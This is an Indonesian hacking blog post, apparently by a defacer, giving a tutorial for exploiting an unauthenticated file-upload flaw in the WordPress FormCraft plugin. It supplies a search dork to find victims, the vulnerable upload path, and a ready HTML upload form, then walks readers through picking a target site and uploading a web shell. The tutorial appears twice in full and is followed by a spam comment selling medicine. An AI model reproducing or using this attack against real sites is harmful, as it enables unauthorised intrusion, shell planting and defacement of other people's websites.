Assalamualikum
Marhaban Ya Ramadhan
Gak terasa udah memasuki bulan puasa Ramadhan
Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D
Shortcut : Click Here for Tutorial on Youtube
BAHAN :
1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/
2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. CSRF
<form method="POST"
action="http://FUCK.yu/wp-content/plugins/formcraft/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Hajar...!!!</button>
</form>
4. Handsome B-)
POC :
1. Agar varokah, dorking dulu lah :D Whatever, pake bing atau google :)
2. Choose your target, men. And this is my FUCKIN target :D
3. Masukkan exploit nya di belakang Url target anda. Dan jika vuln maka penampakan nya seperti ini
4. Go to your CSRF, men . Lalu edit lah seperti ini, dan klik SAVE
5. Culik CSRF nya ke browser yang anda gunakan. Atau biar lebih simpel buka CSRF nya :D
6. Upload your FUCKIN Shell, dude
7. Penampakan Shell yang berhasil di unggah
8. Are you KIDDING me ?????
Marhaban Ya Ramadhan
Gak terasa udah memasuki bulan puasa Ramadhan
Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D
Shortcut : Click Here for Tutorial on Youtube
BAHAN :
1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/
2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. CSRF
<form method="POST"
action="http://FUCK.yu/wp-content/plugins/formcraft/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Hajar...!!!</button>
</form>
4. Handsome B-)
POC :
1. Agar varokah, dorking dulu lah :D Whatever, pake bing atau google :)
2. Choose your target, men. And this is my FUCKIN target :D
3. Masukkan exploit nya di belakang Url target anda. Dan jika vuln maka penampakan nya seperti ini
4. Go to your CSRF, men . Lalu edit lah seperti ini, dan klik SAVE
5. Culik CSRF nya ke browser yang anda gunakan. Atau biar lebih simpel buka CSRF nya :D
6. Upload your FUCKIN Shell, dude
7. Penampakan Shell yang berhasil di unggah
8. Are you KIDDING me ?????
Obat Raja Singa Apotik ? Segera Hubungi Kami Dan Pesan Obatnya Sekarang Juga di Fast Respond : 087705015423 PIN : 207C6F18.
BalasHapus